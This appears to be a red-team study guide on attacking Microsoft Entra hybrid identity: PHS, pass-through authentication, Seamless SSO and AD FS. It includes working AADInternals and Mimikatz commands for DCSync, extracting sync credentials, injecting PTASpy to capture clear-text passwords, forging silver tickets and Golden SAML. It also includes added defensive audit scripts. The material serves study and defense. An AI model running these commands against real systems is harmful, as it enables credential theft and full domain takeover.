Hybrid Identity

Organizations have resources, devices and applications both on-premises and in the cloud. Many enterprises use their on-prem AD identities to access Azure applications, to avoid managing separate identities in both places.

Entra Connect

An on-premises AD can be integrated with Entra ID using Entra Connect with one of the following methods. Every method supports Single Sign-on (SSO):

  • Password Hash Sync (PHS)

  • Pass-Through Authentication (PTA)

  • Federation

PHS (Password Hash Sync)

It syncs users and a hash of their password hashes (not clear-text passwords or the original hashes) from on-prem AD to Entra ID. This is the simplest and most popular method for getting a hybrid identity.

PHS is required for features like Identity Protection and AAD Domain Services.

By default, password expiry and account expiry are not reflected in Entra ID. That means a user whose on-prem password has expired can continue to access Azure resources using the old password.

On-prem, an account named MSOL_<installationID> is automatically created. This account has replication (DCSync) permissions in the on-prem AD.

Enumerate MSOL users:

Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl

Once the Entra Connect server is compromised, use the commands below from the AADInternals module to extract the credentials of the MSOL_* and Sync_* accounts in clear text:

Import-Module AADInternals\AADInternals.psd1

Get-AADIntSyncCredentials

Using the creds of the MSOL_* account, we can run DCSync against the on-prem AD:

runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd

Invoke-Mimikatz -Command '"lsadump::dcsync /user:defeng\krbtgt /domain:defeng.corp /dc:defeng-dc.defeng.corp"'
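The defensive counterpart to the MSOL_* check above is knowing exactly who can replicate the directory. The following script is an added example, not part of the original notes or of AADInternals: it reads the ACL of the domain naming context and reports every principal that is DCSync-capable, whether through a specific replication extended right, "all extended rights", or GenericAll. The MSOL_* account is expected to appear by design; the list of other expected holders is an assumption that you should adjust for your forest.

```powershell
# Added example (not from the original notes): audit which principals hold
# DCSync-capable rights on the domain naming context. The MSOL_* account is
# expected to appear here by design; anything else outside the allow-list is
# worth a ticket. The allow-list is an assumption; adjust it for your forest.
Import-Module ActiveDirectory

# Well-known extended-right GUIDs for directory replication.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllObjects = '00000000-0000-0000-0000-000000000000'

# Principals that legitimately replicate (assumption; extend with sanctioned
# backup or identity-management service accounts from your environment).
$ExpectedHolders = @(
    'Domain Controllers', 'Enterprise Domain Controllers',
    'Enterprise Read-only Domain Controllers', 'Administrators',
    'Domain Admins', 'Enterprise Admins', 'SYSTEM'
)

function Get-DcSyncRightHolders {
    $domainDN = (Get-ADDomain).DistinguishedName
    $acl = Get-Acl -Path "AD:\$domainDN"

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights  = $ace.ActiveDirectoryRights.ToString()
        $objType = $ace.ObjectType.ToString()

        # Three ways to end up DCSync-capable: a specific replication right,
        # "all extended rights" (ObjectType is the null GUID), or GenericAll.
        $grants = $null
        if ($ReplicationRights.ContainsKey($objType) -and $rights -match 'ExtendedRight') {
            $grants = $ReplicationRights[$objType]
        } elseif ($objType -eq $AllObjects -and $rights -match 'ExtendedRight') {
            $grants = 'All extended rights'
        } elseif ($rights -match 'GenericAll') {
            $grants = 'GenericAll'
        }
        if (-not $grants) { continue }

        $name = $ace.IdentityReference.Value.Split('\')[-1]
        [pscustomobject]@{
            Identity   = $ace.IdentityReference.Value
            Grants     = $grants
            Inherited  = $ace.IsInherited
            IsMsol     = $name -like 'MSOL_*'
            Unexpected = -not ($name -in $ExpectedHolders -or $name -like 'MSOL_*')
        }
    }
}

# Unexpected holders sort to the top of the report.
Get-DcSyncRightHolders | Sort-Object Unexpected -Descending | Format-Table -AutoSize
```

Run it from a host with the RSAT ActiveDirectory module as a user that can read the domain head's security descriptor. A second MSOL_* account, or any non-DC principal marked Unexpected, is the finding to chase; the MSOL_* account itself should only ever be used from the Entra Connect server.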

PTA (Pass-through Authentication)

Microsoft Entra pass-through authentication allows your users to sign in to both on-premises and cloud-based applications using the same passwords. When users sign in using Microsoft Entra ID, this feature validates users' passwords directly against your on-premises Active Directory.

If we compromise a server with the authentication agent running, we can get the credentials of users in plain text. We first need to upload AADInternals.zip (https://github.com/Gerenios/AADInternals). Next, unzip it and run:

Import-Module AADInternals\AADInternals.psd1

Install PTASpy into the PTA agent and collect credentials.

Install-AADIntPTASpy

All passwords are now accepted and credentials are collected to C:\PTASpy\PTASpy.csv

# Get clear-text passwords from users authenticating
Get-AADIntPTASpyLog
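For a PTA agent host, the two things a defender wants to check are the artifacts the technique above leaves behind and whether anything foreign has been loaded into the agent process. The script below is an added example, not part of the original notes or of AADInternals. It checks for the C:\PTASpy drop location named above and lists every module in the agent process whose Authenticode signature is not a valid Microsoft one. The agent process name is an assumption based on the Microsoft Entra Connect Authentication Agent service binary; confirm it on your build.

```powershell
# Added example (not from the original notes): triage a PTA agent host for
# the PTASpy technique. Looks for the tool's drop folder and for modules in
# the agent process that are unsigned or not signed by Microsoft.
# Process name is an assumption; verify with Get-Service / Get-Process.
$AgentProcessName = 'AzureADConnectAuthenticationAgentService'
$SpyArtifacts     = @('C:\PTASpy', 'C:\PTASpy\PTASpy.csv')

function Test-PtaAgentIntegrity {
    $findings = @()

    # 1. Filesystem artifacts left by the collection step.
    foreach ($path in $SpyArtifacts) {
        if (Test-Path -LiteralPath $path) {
            $findings += [pscustomobject]@{ Type = 'Artifact'; Detail = $path }
        }
    }

    # 2. Foreign modules inside the agent process. Reading another process's
    #    module list needs an elevated shell of the same bitness as the agent.
    $proc = Get-Process -Name $AgentProcessName -ErrorAction SilentlyContinue
    if (-not $proc) {
        $findings += [pscustomobject]@{ Type = 'Info'; Detail = "$AgentProcessName is not running" }
        return $findings
    }
    foreach ($m in $proc.Modules) {
        $sig    = Get-AuthenticodeSignature -FilePath $m.FileName -ErrorAction SilentlyContinue
        $signer = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
        if (-not $sig -or $sig.Status -ne 'Valid' -or $signer -notmatch 'Microsoft') {
            $findings += [pscustomobject]@{
                Type   = 'Module'
                Detail = "$($m.FileName) signer=$signer status=$($sig.Status)"
            }
        }
    }
    return $findings
}

Test-PtaAgentIntegrity | Format-Table -AutoSize
```

An empty result is the expected state on a healthy agent. Any Artifact row, or a Module row pointing at a DLL outside the agent's own install directory, is worth treating as a credential-exposure incident rather than a configuration oddity, because every password validated by that agent since the injection is at risk.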

Seamless SSO

Entra Seamless SSO automatically signs users in when they are on an on-prem domain-joined machine. There is no need to use passwords to log in to Entra ID and on-prem applications. In the on-prem AD a computer account AZUREADSSOACC$ is created. This account's Kerberos decryption key is shared with Entra ID.

This means that if we can compromise the NTLM hash of the machine account, we can create silver tickets for any synced on-prem user.

First, get the NTLM hash of the account:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:defeng.corp /dc:defeng-dc.defeng.corp"'

We just need the userPrincipalName and SID of the user to create the Silver ticket that can be used from any machine connected to the internet.

Create silver ticket:

Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin1 /sid:S-1-5-21-938785110-3291390659-577725712 /id:1108 /domain:defeng.corp /rc4:<> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
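Because the silver ticket above stays valid for as long as the AZUREADSSOACC$ key does, the main mitigation is rolling that key regularly. The script below is an added example, not part of the original notes: it reads the computer account's PasswordLastSet and reports whether the key is older than a threshold. The 30-day default follows Microsoft's published guidance for Seamless SSO key rollover; the threshold is a parameter and the account name is assumed to be the default one created by Entra Connect.

```powershell
# Added example (not from the original notes): report the age of the
# AZUREADSSOACC$ Kerberos key and whether it is due for rollover.
# Default threshold of 30 days follows Microsoft's Seamless SSO guidance.
Import-Module ActiveDirectory

function Get-SeamlessSsoKeyStatus {
    param(
        [int]$MaxAgeDays = 30,
        [string]$AccountName = 'AZUREADSSOACC'   # default name; assumption
    )
    $acct = Get-ADComputer -Identity $AccountName `
        -Properties PasswordLastSet, ServicePrincipalName, Enabled, KerberosEncryptionType `
        -ErrorAction Stop

    $age = (Get-Date) - $acct.PasswordLastSet
    [pscustomobject]@{
        Account         = $acct.SamAccountName
        Enabled         = $acct.Enabled
        PasswordLastSet = $acct.PasswordLastSet
        KeyAgeDays      = [int]$age.TotalDays
        NeedsRollover   = ($age.TotalDays -gt $MaxAgeDays)
        EncryptionTypes = ($acct.KerberosEncryptionType -join ', ')
        SPNs            = ($acct.ServicePrincipalName -join '; ')
    }
}

Get-SeamlessSsoKeyStatus | Format-List
```

If NeedsRollover is true, the key is rolled from the Entra Connect server with the AzureADSSO module shipped alongside Entra Connect (Update-AzureADSSOForest), which resets the AZUREADSSOACC$ password on-prem and pushes the new key to Entra ID; the rollover invalidates any ticket forged with the old key. Auditing changes to this one account (event 4742 on the DCs) is cheap and catches both legitimate rollovers and anything unexpected.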

Federation

In the case of federation, a trust is established between unrelated parties, like an on-premises AD and Entra ID. Users can access cloud applications by using their on-prem credentials.

ADFS

AD FS is a claims-based identity model. Claims are simply statements (for example name, identity, group) made about users that are used primarily for authorizing access to claims-based applications located anywhere on the internet.

A user is identified by an ImmutableID. It is globally unique and stored in Entra ID. The ImmutableID is stored on-prem as ms-DS-ConsistencyGuid for the user and/or can be derived from the GUID of the user.

Golden SAML attack

In AD FS, a SAML response is signed by a token-signing certificate. If the certificate is compromised, it is possible to authenticate to Entra ID as ANY user in Entra ID. The certificate can be extracted from the AD FS server with Domain Admin privileges and then used from an internet-connected machine.
